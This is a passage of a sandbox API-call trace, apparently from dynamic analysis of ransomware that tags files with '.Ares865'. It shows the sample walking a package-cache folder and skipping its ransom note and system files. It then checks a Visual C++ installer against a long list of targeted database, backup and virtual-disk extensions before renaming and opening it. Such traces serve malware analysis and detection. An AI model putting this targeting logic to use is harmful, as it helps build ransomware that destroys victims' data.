dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0074.178] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c126ba0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c126ba0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0074.182] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0074.182] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1afc00, ftCreationTime.dwHighDateTime=0x1ced4da, ftLastAccessTime.dwLowDateTime=0x5a1afc00, ftLastAccessTime.dwHighDateTime=0x1ced4da, ftLastWriteTime.dwLowDateTime=0x5a1afc00, ftLastWriteTime.dwHighDateTime=0x1ced4da, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vc_runtimeMinimum_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0074.182] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0074.183] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="aoldtz.exe") returned 1 [0074.183] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2=".") returned 1 [0074.183] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="..") returned 1 [0074.183] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="windows") returned -1 [0074.188] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="bootmgr") returned 1 [0074.189] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="temp") returned 1 [0074.189] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="pagefile.sys") returned 1 [0074.193] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="boot") returned 1 [0074.193] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="ids.txt") returned 1 [0074.193] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="ntuser.dat") returned 1 [0074.193] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="perflogs") returned 1 [0074.193] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="MSBuild") returned 1 [0074.201] lstrlenW (lpString="vc_runtimeMinimum_x64.msi") returned 25 [0074.201] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 123 [0074.201] lstrcpyW (in: lpString1=0x2cce4e6, lpString2="vc_runtimeMinimum_x64.msi" | out: lpString1="vc_runtimeMinimum_x64.msi") returned="vc_runtimeMinimum_x64.msi" [0074.202] lstrlenW (lpString="vc_runtimeMinimum_x64.msi") returned 25 [0074.207] lstrlenW (lpString="Ares865") returned 7 [0074.207] lstrcmpiW (lpString1="x64.msi", lpString2="Ares865") returned 1 [0074.207] lstrlenW (lpString=".dll") returned 4 [0074.208] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2=".dll") returned 1 [0074.208] lstrlenW (lpString=".lnk") returned 4 [0074.223] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2=".lnk") returned 1 [0074.230] lstrlenW (lpString=".ini") returned 4 [0074.230] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2=".ini") returned 1 [0074.230] lstrlenW (lpString=".sys") returned 4 [0074.230] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2=".sys") returned 1 [0074.230] lstrlenW (lpString="vc_runtimeMinimum_x64.msi") returned 25 [0074.230] lstrlenW (lpString="bak") returned 3 [0074.230] lstrcmpiW (lpString1="msi", lpString2="bak") returned 1 [0074.230] lstrlenW (lpString="ba_") returned 3 [0074.230] lstrcmpiW (lpString1="msi", lpString2="ba_") returned 1 [0074.230] lstrlenW (lpString="dbb") returned 3 [0074.230] lstrcmpiW (lpString1="msi", lpString2="dbb") returned 1 [0074.230] lstrlenW (lpString="vmdk") returned 4 [0074.230] lstrcmpiW (lpString1=".msi", lpString2="vmdk") returned -1 [0074.230] lstrlenW (lpString="rar") returned 3 [0074.230] lstrcmpiW (lpString1="msi", lpString2="rar") returned -1 [0074.230] lstrlenW (lpString="zip") returned 3 [0074.230] lstrcmpiW (lpString1="msi", lpString2="zip") returned -1 [0074.230] lstrlenW (lpString="tgz") returned 3 [0074.230] lstrcmpiW (lpString1="msi", lpString2="tgz") returned -1 [0074.230] lstrlenW (lpString="vbox") returned 4 [0074.230] lstrcmpiW (lpString1=".msi", lpString2="vbox") returned -1 [0074.230] lstrlenW (lpString="vdi") returned 3 [0074.230] lstrcmpiW (lpString1="msi", lpString2="vdi") returned -1 [0074.230] lstrlenW (lpString="vhd") returned 3 [0074.230] lstrcmpiW (lpString1="msi", lpString2="vhd") returned -1 [0074.230] lstrlenW (lpString="vhdx") returned 4 [0074.230] lstrcmpiW (lpString1=".msi", lpString2="vhdx") returned -1 [0074.231] lstrlenW (lpString="avhd") returned 4 [0074.231] lstrcmpiW (lpString1=".msi", lpString2="avhd") returned -1 [0074.231] lstrlenW (lpString="db") returned 2 [0074.231] lstrcmpiW (lpString1="si", lpString2="db") returned 1 [0074.231] lstrlenW (lpString="db2") returned 3 [0074.231] lstrcmpiW (lpString1="msi", lpString2="db2") returned 1 [0074.231] lstrlenW (lpString="db3") returned 3 [0074.231] lstrcmpiW (lpString1="msi", lpString2="db3") returned 1 [0074.231] lstrlenW (lpString="dbf") returned 3 [0074.231] lstrcmpiW (lpString1="msi", lpString2="dbf") returned 1 [0074.231] lstrlenW (lpString="mdf") returned 3 [0074.231] lstrcmpiW (lpString1="msi", lpString2="mdf") returned 1 [0074.231] lstrlenW (lpString="mdb") returned 3 [0074.231] lstrcmpiW (lpString1="msi", lpString2="mdb") returned 1 [0074.231] lstrlenW (lpString="sql") returned 3 [0074.231] lstrcmpiW (lpString1="msi", lpString2="sql") returned -1 [0074.231] lstrlenW (lpString="sqlite") returned 6 [0074.231] lstrcmpiW (lpString1="64.msi", lpString2="sqlite") returned -1 [0074.231] lstrlenW (lpString="sqlite3") returned 7 [0074.231] lstrcmpiW (lpString1="x64.msi", lpString2="sqlite3") returned 1 [0074.231] lstrlenW (lpString="sqlitedb") returned 8 [0074.231] lstrcmpiW (lpString1="_x64.msi", lpString2="sqlitedb") returned -1 [0074.231] lstrlenW (lpString="xml") returned 3 [0074.231] lstrcmpiW (lpString1="msi", lpString2="xml") returned -1 [0074.231] lstrlenW (lpString="$er") returned 3 [0074.231] lstrcmpiW (lpString1="msi", lpString2="$er") returned 1 [0074.231] lstrlenW (lpString="4dd") returned 3 [0074.231] lstrcmpiW (lpString1="msi", lpString2="4dd") returned 1 [0074.231] lstrlenW (lpString="4dl") returned 3 [0074.231] lstrcmpiW (lpString1="msi", lpString2="4dl") returned 1 [0074.231] lstrlenW (lpString="^^^") returned 3 [0074.231] lstrcmpiW (lpString1="msi", lpString2="^^^") returned 1 [0074.231] lstrlenW (lpString="abs") returned 3 [0074.231] lstrcmpiW (lpString1="msi", lpString2="abs") returned 1 [0074.231] lstrlenW (lpString="abx") returned 3 [0074.231] lstrcmpiW (lpString1="msi", lpString2="abx") returned 1 [0074.231] lstrlenW (lpString="accdb") returned 5 [0074.231] lstrcmpiW (lpString1="4.msi", lpString2="accdb") returned -1 [0074.232] lstrlenW (lpString="accdc") returned 5 [0074.232] lstrcmpiW (lpString1="4.msi", lpString2="accdc") returned -1 [0074.232] lstrlenW (lpString="accde") returned 5 [0074.232] lstrcmpiW (lpString1="4.msi", lpString2="accde") returned -1 [0074.232] lstrlenW (lpString="accdr") returned 5 [0074.232] lstrcmpiW (lpString1="4.msi", lpString2="accdr") returned -1 [0074.232] lstrlenW (lpString="accdt") returned 5 [0074.232] lstrcmpiW (lpString1="4.msi", lpString2="accdt") returned -1 [0074.232] lstrlenW (lpString="accdw") returned 5 [0074.232] lstrcmpiW (lpString1="4.msi", lpString2="accdw") returned -1 [0074.232] lstrlenW (lpString="accft") returned 5 [0074.232] lstrcmpiW (lpString1="4.msi", lpString2="accft") returned -1 [0074.232] lstrlenW (lpString="adb") returned 3 [0074.232] lstrcmpiW (lpString1="msi", lpString2="adb") returned 1 [0074.232] lstrlenW (lpString="adb") returned 3 [0074.232] lstrcmpiW (lpString1="msi", lpString2="adb") returned 1 [0074.232] lstrlenW (lpString="ade") returned 3 [0074.232] lstrcmpiW (lpString1="msi", lpString2="ade") returned 1 [0074.232] lstrlenW (lpString="adf") returned 3 [0074.232] lstrcmpiW (lpString1="msi", lpString2="adf") returned 1 [0074.232] lstrlenW (lpString="adn") returned 3 [0074.232] lstrcmpiW (lpString1="msi", lpString2="adn") returned 1 [0074.232] lstrlenW (lpString="adp") returned 3 [0074.232] lstrcmpiW (lpString1="msi", lpString2="adp") returned 1 [0074.232] lstrlenW (lpString="alf") returned 3 [0074.232] lstrcmpiW (lpString1="msi", lpString2="alf") returned 1 [0074.232] lstrlenW (lpString="ask") returned 3 [0074.232] lstrcmpiW (lpString1="msi", lpString2="ask") returned 1 [0074.232] lstrlenW (lpString="btr") returned 3 [0074.232] lstrcmpiW (lpString1="msi", lpString2="btr") returned 1 [0074.232] lstrlenW (lpString="cat") returned 3 [0074.232] lstrcmpiW (lpString1="msi", lpString2="cat") returned 1 [0074.232] lstrlenW (lpString="cdb") returned 3 [0074.232] lstrcmpiW (lpString1="msi", lpString2="cdb") returned 1 [0074.232] lstrlenW (lpString="ckp") returned 3 [0074.232] lstrcmpiW (lpString1="msi", lpString2="ckp") returned 1 [0074.232] lstrlenW (lpString="cma") returned 3 [0074.232] lstrcmpiW (lpString1="msi", lpString2="cma") returned 1 [0074.233] lstrlenW (lpString="cpd") returned 3 [0074.233] lstrcmpiW (lpString1="msi", lpString2="cpd") returned 1 [0074.233] lstrlenW (lpString="dacpac") returned 6 [0074.233] lstrcmpiW (lpString1="64.msi", lpString2="dacpac") returned -1 [0074.233] lstrlenW (lpString="dad") returned 3 [0074.233] lstrcmpiW (lpString1="msi", lpString2="dad") returned 1 [0074.233] lstrlenW (lpString="dadiagrams") returned 10 [0074.233] lstrcmpiW (lpString1="um_x64.msi", lpString2="dadiagrams") returned 1 [0074.233] lstrlenW (lpString="daschema") returned 8 [0074.233] lstrcmpiW (lpString1="_x64.msi", lpString2="daschema") returned -1 [0074.233] lstrlenW (lpString="db-journal") returned 10 [0074.233] lstrcmpiW (lpString1="um_x64.msi", lpString2="db-journal") returned 1 [0074.233] lstrlenW (lpString="db-shm") returned 6 [0074.233] lstrcmpiW (lpString1="64.msi", lpString2="db-shm") returned -1 [0074.233] lstrlenW (lpString="db-wal") returned 6 [0074.233] lstrcmpiW (lpString1="64.msi", lpString2="db-wal") returned -1 [0074.233] lstrlenW (lpString="dbc") returned 3 [0074.233] lstrcmpiW (lpString1="msi", lpString2="dbc") returned 1 [0074.233] lstrlenW (lpString="dbs") returned 3 [0074.233] lstrcmpiW (lpString1="msi", lpString2="dbs") returned 1 [0074.233] lstrlenW (lpString="dbt") returned 3 [0074.233] lstrcmpiW (lpString1="msi", lpString2="dbt") returned 1 [0074.233] lstrlenW (lpString="dbv") returned 3 [0074.233] lstrcmpiW (lpString1="msi", lpString2="dbv") returned 1 [0074.233] lstrlenW (lpString="dbx") returned 3 [0074.233] lstrcmpiW (lpString1="msi", lpString2="dbx") returned 1 [0074.233] lstrlenW (lpString="dcb") returned 3 [0074.233] lstrcmpiW (lpString1="msi", lpString2="dcb") returned 1 [0074.233] lstrlenW (lpString="dct") returned 3 [0074.233] lstrcmpiW (lpString1="msi", lpString2="dct") returned 1 [0074.233] lstrlenW (lpString="dcx") returned 3 [0074.233] lstrcmpiW (lpString1="msi", lpString2="dcx") returned 1 [0074.233] lstrlenW (lpString="ddl") returned 3 [0074.233] lstrcmpiW (lpString1="msi", lpString2="ddl") returned 1 [0074.233] lstrlenW (lpString="dlis") returned 4 [0074.233] lstrcmpiW (lpString1=".msi", lpString2="dlis") returned -1 [0074.233] lstrlenW (lpString="dp1") returned 3 [0074.233] lstrcmpiW (lpString1="msi", lpString2="dp1") returned 1 [0074.233] lstrlenW (lpString="dqy") returned 3 [0074.234] lstrcmpiW (lpString1="msi", lpString2="dqy") returned 1 [0074.234] lstrlenW (lpString="dsk") returned 3 [0074.234] lstrcmpiW (lpString1="msi", lpString2="dsk") returned 1 [0074.234] lstrlenW (lpString="dsn") returned 3 [0074.234] lstrcmpiW (lpString1="msi", lpString2="dsn") returned 1 [0074.234] lstrlenW (lpString="dtsx") returned 4 [0074.234] lstrcmpiW (lpString1=".msi", lpString2="dtsx") returned -1 [0074.234] lstrlenW (lpString="dxl") returned 3 [0074.234] lstrcmpiW (lpString1="msi", lpString2="dxl") returned 1 [0074.234] lstrlenW (lpString="eco") returned 3 [0074.234] lstrcmpiW (lpString1="msi", lpString2="eco") returned 1 [0074.234] lstrlenW (lpString="ecx") returned 3 [0074.234] lstrcmpiW (lpString1="msi", lpString2="ecx") returned 1 [0074.234] lstrlenW (lpString="edb") returned 3 [0074.234] lstrcmpiW (lpString1="msi", lpString2="edb") returned 1 [0074.234] lstrlenW (lpString="epim") returned 4 [0074.234] lstrcmpiW (lpString1=".msi", lpString2="epim") returned -1 [0074.234] lstrlenW (lpString="fcd") returned 3 [0074.234] lstrcmpiW (lpString1="msi", lpString2="fcd") returned 1 [0074.234] lstrlenW (lpString="fdb") returned 3 [0074.234] lstrcmpiW (lpString1="msi", lpString2="fdb") returned 1 [0074.234] lstrlenW (lpString="fic") returned 3 [0074.234] lstrcmpiW (lpString1="msi", lpString2="fic") returned 1 [0074.234] lstrlenW (lpString="flexolibrary") returned 12 [0074.234] lstrcmpiW (lpString1="imum_x64.msi", lpString2="flexolibrary") returned 1 [0074.234] lstrlenW (lpString="fm5") returned 3 [0074.234] lstrcmpiW (lpString1="msi", lpString2="fm5") returned 1 [0074.234] lstrlenW (lpString="fmp") returned 3 [0074.234] lstrcmpiW (lpString1="msi", lpString2="fmp") returned 1 [0074.234] lstrlenW (lpString="fmp12") returned 5 [0074.234] lstrcmpiW (lpString1="4.msi", lpString2="fmp12") returned -1 [0074.234] lstrlenW (lpString="fmpsl") returned 5 [0074.234] lstrcmpiW (lpString1="4.msi", lpString2="fmpsl") returned -1 [0074.234] lstrlenW (lpString="fol") returned 3 [0074.235] lstrcmpiW (lpString1="msi", lpString2="fol") returned 1 [0074.235] lstrlenW (lpString="fp3") returned 3 [0074.235] lstrcmpiW (lpString1="msi", lpString2="fp3") returned 1 [0074.235] lstrlenW (lpString="fp4") returned 3 [0074.235] lstrcmpiW (lpString1="msi", lpString2="fp4") returned 1 [0074.235] lstrlenW (lpString="fp5") returned 3 [0074.235] lstrcmpiW (lpString1="msi", lpString2="fp5") returned 1 [0074.235] lstrlenW (lpString="fp7") returned 3 [0074.235] lstrcmpiW (lpString1="msi", lpString2="fp7") returned 1 [0074.235] lstrlenW (lpString="fpt") returned 3 [0074.235] lstrcmpiW (lpString1="msi", lpString2="fpt") returned 1 [0074.235] lstrlenW (lpString="frm") returned 3 [0074.235] lstrcmpiW (lpString1="msi", lpString2="frm") returned 1 [0074.235] lstrlenW (lpString="gdb") returned 3 [0074.235] lstrcmpiW (lpString1="msi", lpString2="gdb") returned 1 [0074.235] lstrlenW (lpString="gdb") returned 3 [0074.235] lstrcmpiW (lpString1="msi", lpString2="gdb") returned 1 [0074.235] lstrlenW (lpString="grdb") returned 4 [0074.235] lstrcmpiW (lpString1=".msi", lpString2="grdb") returned -1 [0074.235] lstrlenW (lpString="gwi") returned 3 [0074.235] lstrcmpiW (lpString1="msi", lpString2="gwi") returned 1 [0074.235] lstrlenW (lpString="hdb") returned 3 [0074.235] lstrcmpiW (lpString1="msi", lpString2="hdb") returned 1 [0074.235] lstrlenW (lpString="his") returned 3 [0074.235] lstrcmpiW (lpString1="msi", lpString2="his") returned 1 [0074.235] lstrlenW (lpString="ib") returned 2 [0074.235] lstrcmpiW (lpString1="si", lpString2="ib") returned 1 [0074.235] lstrlenW (lpString="idb") returned 3 [0074.235] lstrcmpiW (lpString1="msi", lpString2="idb") returned 1 [0074.235] lstrlenW (lpString="ihx") returned 3 [0074.235] lstrcmpiW (lpString1="msi", lpString2="ihx") returned 1 [0074.235] lstrlenW (lpString="itdb") returned 4 [0074.235] lstrcmpiW (lpString1=".msi", lpString2="itdb") returned -1 [0074.235] lstrlenW (lpString="itw") returned 3 [0074.235] lstrcmpiW (lpString1="msi", lpString2="itw") returned 1 [0074.235] lstrlenW (lpString="jet") returned 3 [0074.235] lstrcmpiW (lpString1="msi", lpString2="jet") returned 1 [0074.235] lstrlenW (lpString="jtx") returned 3 [0074.236] lstrcmpiW (lpString1="msi", lpString2="jtx") returned 1 [0074.236] lstrlenW (lpString="kdb") returned 3 [0074.236] lstrcmpiW (lpString1="msi", lpString2="kdb") returned 1 [0074.236] lstrlenW (lpString="kexi") returned 4 [0074.236] lstrcmpiW (lpString1=".msi", lpString2="kexi") returned -1 [0074.236] lstrlenW (lpString="kexic") returned 5 [0074.236] lstrcmpiW (lpString1="4.msi", lpString2="kexic") returned -1 [0074.236] lstrlenW (lpString="kexis") returned 5 [0074.236] lstrcmpiW (lpString1="4.msi", lpString2="kexis") returned -1 [0074.236] lstrlenW (lpString="lgc") returned 3 [0074.236] lstrcmpiW (lpString1="msi", lpString2="lgc") returned 1 [0074.236] lstrlenW (lpString="lwx") returned 3 [0074.236] lstrcmpiW (lpString1="msi", lpString2="lwx") returned 1 [0074.236] lstrlenW (lpString="maf") returned 3 [0074.236] lstrcmpiW (lpString1="msi", lpString2="maf") returned 1 [0074.236] lstrlenW (lpString="maq") returned 3 [0074.236] lstrcmpiW (lpString1="msi", lpString2="maq") returned 1 [0074.236] lstrlenW (lpString="mar") returned 3 [0074.236] lstrcmpiW (lpString1="msi", lpString2="mar") returned 1 [0074.236] lstrlenW (lpString="marshal") returned 7 [0074.236] lstrcmpiW (lpString1="x64.msi", lpString2="marshal") returned 1 [0074.236] lstrlenW (lpString="mas") returned 3 [0074.236] lstrcmpiW (lpString1="msi", lpString2="mas") returned 1 [0074.236] lstrlenW (lpString="mav") returned 3 [0074.236] lstrcmpiW (lpString1="msi", lpString2="mav") returned 1 [0074.236] lstrlenW (lpString="maw") returned 3 [0074.236] lstrcmpiW (lpString1="msi", lpString2="maw") returned 1 [0074.236] lstrlenW (lpString="mdbhtml") returned 7 [0074.236] lstrcmpiW (lpString1="x64.msi", lpString2="mdbhtml") returned 1 [0074.236] lstrlenW (lpString="mdn") returned 3 [0074.236] lstrcmpiW (lpString1="msi", lpString2="mdn") returned 1 [0074.236] lstrlenW (lpString="mdt") returned 3 [0074.236] lstrcmpiW (lpString1="msi", lpString2="mdt") returned 1 [0074.236] lstrlenW (lpString="mfd") returned 3 [0074.236] lstrcmpiW (lpString1="msi", lpString2="mfd") returned 1 [0074.236] lstrlenW (lpString="mpd") returned 3 [0074.236] lstrcmpiW (lpString1="msi", lpString2="mpd") returned 1 [0074.236] lstrlenW (lpString="mrg") returned 3 [0074.237] lstrcmpiW (lpString1="msi", lpString2="mrg") returned 1 [0074.237] lstrlenW (lpString="mud") returned 3 [0074.237] lstrcmpiW (lpString1="msi", lpString2="mud") returned -1 [0074.237] lstrlenW (lpString="mwb") returned 3 [0074.237] lstrcmpiW (lpString1="msi", lpString2="mwb") returned -1 [0074.237] lstrlenW (lpString="myd") returned 3 [0074.237] lstrcmpiW (lpString1="msi", lpString2="myd") returned -1 [0074.237] lstrlenW (lpString="ndf") returned 3 [0074.237] lstrcmpiW (lpString1="msi", lpString2="ndf") returned -1 [0074.237] lstrlenW (lpString="nnt") returned 3 [0074.237] lstrcmpiW (lpString1="msi", lpString2="nnt") returned -1 [0074.237] lstrlenW (lpString="nrmlib") returned 6 [0074.237] lstrcmpiW (lpString1="64.msi", lpString2="nrmlib") returned -1 [0074.237] lstrlenW (lpString="ns2") returned 3 [0074.237] lstrcmpiW (lpString1="msi", lpString2="ns2") returned -1 [0074.237] lstrlenW (lpString="ns3") returned 3 [0074.237] lstrcmpiW (lpString1="msi", lpString2="ns3") returned -1 [0074.237] lstrlenW (lpString="ns4") returned 3 [0074.237] lstrcmpiW (lpString1="msi", lpString2="ns4") returned -1 [0074.237] lstrlenW (lpString="nsf") returned 3 [0074.237] lstrcmpiW (lpString1="msi", lpString2="nsf") returned -1 [0074.237] lstrlenW (lpString="nv") returned 2 [0074.237] lstrcmpiW (lpString1="si", lpString2="nv") returned 1 [0074.237] lstrlenW (lpString="nv2") returned 3 [0074.237] lstrcmpiW (lpString1="msi", lpString2="nv2") returned -1 [0074.237] lstrlenW (lpString="nwdb") returned 4 [0074.237] lstrcmpiW (lpString1=".msi", lpString2="nwdb") returned -1 [0074.237] lstrlenW (lpString="nyf") returned 3 [0074.237] lstrcmpiW (lpString1="msi", lpString2="nyf") returned -1 [0074.237] lstrlenW (lpString="odb") returned 3 [0074.237] lstrcmpiW (lpString1="msi", lpString2="odb") returned -1 [0074.237] lstrlenW (lpString="odb") returned 3 [0074.237] lstrcmpiW (lpString1="msi", lpString2="odb") returned -1 [0074.237] lstrlenW (lpString="oqy") returned 3 [0074.237] lstrcmpiW (lpString1="msi", lpString2="oqy") returned -1 [0074.237] lstrlenW (lpString="ora") returned 3 [0074.237] lstrcmpiW (lpString1="msi", lpString2="ora") returned -1 [0074.237] lstrlenW (lpString="orx") returned 3 [0074.238] lstrcmpiW (lpString1="msi", lpString2="orx") returned -1 [0074.238] lstrlenW (lpString="owc") returned 3 [0074.238] lstrcmpiW (lpString1="msi", lpString2="owc") returned -1 [0074.238] lstrlenW (lpString="p96") returned 3 [0074.238] lstrcmpiW (lpString1="msi", lpString2="p96") returned -1 [0074.238] lstrlenW (lpString="p97") returned 3 [0074.238] lstrcmpiW (lpString1="msi", lpString2="p97") returned -1 [0074.238] lstrlenW (lpString="pan") returned 3 [0074.238] lstrcmpiW (lpString1="msi", lpString2="pan") returned -1 [0074.238] lstrlenW (lpString="pdb") returned 3 [0074.238] lstrcmpiW (lpString1="msi", lpString2="pdb") returned -1 [0074.238] lstrlenW (lpString="pdm") returned 3 [0074.238] lstrcmpiW (lpString1="msi", lpString2="pdm") returned -1 [0074.238] lstrlenW (lpString="pnz") returned 3 [0074.238] lstrcmpiW (lpString1="msi", lpString2="pnz") returned -1 [0074.238] lstrlenW (lpString="qry") returned 3 [0074.238] lstrcmpiW (lpString1="msi", lpString2="qry") returned -1 [0074.238] lstrlenW (lpString="qvd") returned 3 [0074.238] lstrcmpiW (lpString1="msi", lpString2="qvd") returned -1 [0074.238] lstrlenW (lpString="rbf") returned 3 [0074.238] lstrcmpiW (lpString1="msi", lpString2="rbf") returned -1 [0074.238] lstrlenW (lpString="rctd") returned 4 [0074.238] lstrcmpiW (lpString1=".msi", lpString2="rctd") returned -1 [0074.238] lstrlenW (lpString="rod") returned 3 [0074.238] lstrcmpiW (lpString1="msi", lpString2="rod") returned -1 [0074.238] lstrlenW (lpString="rodx") returned 4 [0074.238] lstrcmpiW (lpString1=".msi", lpString2="rodx") returned -1 [0074.238] lstrlenW (lpString="rpd") returned 3 [0074.238] lstrcmpiW (lpString1="msi", lpString2="rpd") returned -1 [0074.238] lstrlenW (lpString="rsd") returned 3 [0074.238] lstrcmpiW (lpString1="msi", lpString2="rsd") returned -1 [0074.238] lstrlenW (lpString="sas7bdat") returned 8 [0074.238] lstrcmpiW (lpString1="_x64.msi", lpString2="sas7bdat") returned -1 [0074.238] lstrlenW (lpString="sbf") returned 3 [0074.238] lstrcmpiW (lpString1="msi", lpString2="sbf") returned -1 [0074.238] lstrlenW (lpString="scx") returned 3 [0074.238] lstrcmpiW (lpString1="msi", lpString2="scx") returned -1 [0074.238] lstrlenW (lpString="sdb") returned 3 [0074.239] lstrcmpiW (lpString1="msi", lpString2="sdb") returned -1 [0074.239] lstrlenW (lpString="sdc") returned 3 [0074.239] lstrcmpiW (lpString1="msi", lpString2="sdc") returned -1 [0074.239] lstrlenW (lpString="sdf") returned 3 [0074.239] lstrcmpiW (lpString1="msi", lpString2="sdf") returned -1 [0074.239] lstrlenW (lpString="sis") returned 3 [0074.239] lstrcmpiW (lpString1="msi", lpString2="sis") returned -1 [0074.239] lstrlenW (lpString="spq") returned 3 [0074.239] lstrcmpiW (lpString1="msi", lpString2="spq") returned -1 [0074.239] lstrlenW (lpString="te") returned 2 [0074.239] lstrcmpiW (lpString1="si", lpString2="te") returned -1 [0074.239] lstrlenW (lpString="teacher") returned 7 [0074.239] lstrcmpiW (lpString1="x64.msi", lpString2="teacher") returned 1 [0074.239] lstrlenW (lpString="tmd") returned 3 [0074.239] lstrcmpiW (lpString1="msi", lpString2="tmd") returned -1 [0074.239] lstrlenW (lpString="tps") returned 3 [0074.239] lstrcmpiW (lpString1="msi", lpString2="tps") returned -1 [0074.239] lstrlenW (lpString="trc") returned 3 [0074.239] lstrcmpiW (lpString1="msi", lpString2="trc") returned -1 [0074.239] lstrlenW (lpString="trc") returned 3 [0074.239] lstrcmpiW (lpString1="msi", lpString2="trc") returned -1 [0074.239] lstrlenW (lpString="trm") returned 3 [0074.239] lstrcmpiW (lpString1="msi", lpString2="trm") returned -1 [0074.239] lstrlenW (lpString="udb") returned 3 [0074.239] lstrcmpiW (lpString1="msi", lpString2="udb") returned -1 [0074.239] lstrlenW (lpString="udl") returned 3 [0074.239] lstrcmpiW (lpString1="msi", lpString2="udl") returned -1 [0074.239] lstrlenW (lpString="usr") returned 3 [0074.239] lstrcmpiW (lpString1="msi", lpString2="usr") returned -1 [0074.239] lstrlenW (lpString="v12") returned 3 [0074.239] lstrcmpiW (lpString1="msi", lpString2="v12") returned -1 [0074.239] lstrlenW (lpString="vis") returned 3 [0074.239] lstrcmpiW (lpString1="msi", lpString2="vis") returned -1 [0074.239] lstrlenW (lpString="vpd") returned 3 [0074.239] lstrcmpiW (lpString1="msi", lpString2="vpd") returned -1 [0074.239] lstrlenW (lpString="vvv") returned 3 [0074.239] lstrcmpiW (lpString1="msi", lpString2="vvv") returned -1 [0074.239] lstrlenW (lpString="wdb") returned 3 [0074.239] lstrcmpiW (lpString1="msi", lpString2="wdb") returned -1 [0074.240] lstrlenW (lpString="wmdb") returned 4 [0074.240] lstrcmpiW (lpString1=".msi", lpString2="wmdb") returned -1 [0074.240] lstrlenW (lpString="wrk") returned 3 [0074.240] lstrcmpiW (lpString1="msi", lpString2="wrk") returned -1 [0074.240] lstrlenW (lpString="xdb") returned 3 [0074.240] lstrcmpiW (lpString1="msi", lpString2="xdb") returned -1 [0074.240] lstrlenW (lpString="xld") returned 3 [0074.240] lstrcmpiW (lpString1="msi", lpString2="xld") returned -1 [0074.240] lstrlenW (lpString="xmlff") returned 5 [0074.240] lstrcmpiW (lpString1="4.msi", lpString2="xmlff") returned -1 [0074.240] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.Ares865") returned 148 [0074.240] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.Ares865" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.ares865"), dwFlags=0x1) returned 1 [0074.249] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.Ares865" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.249] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=151552) returned 1 [0074.250] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 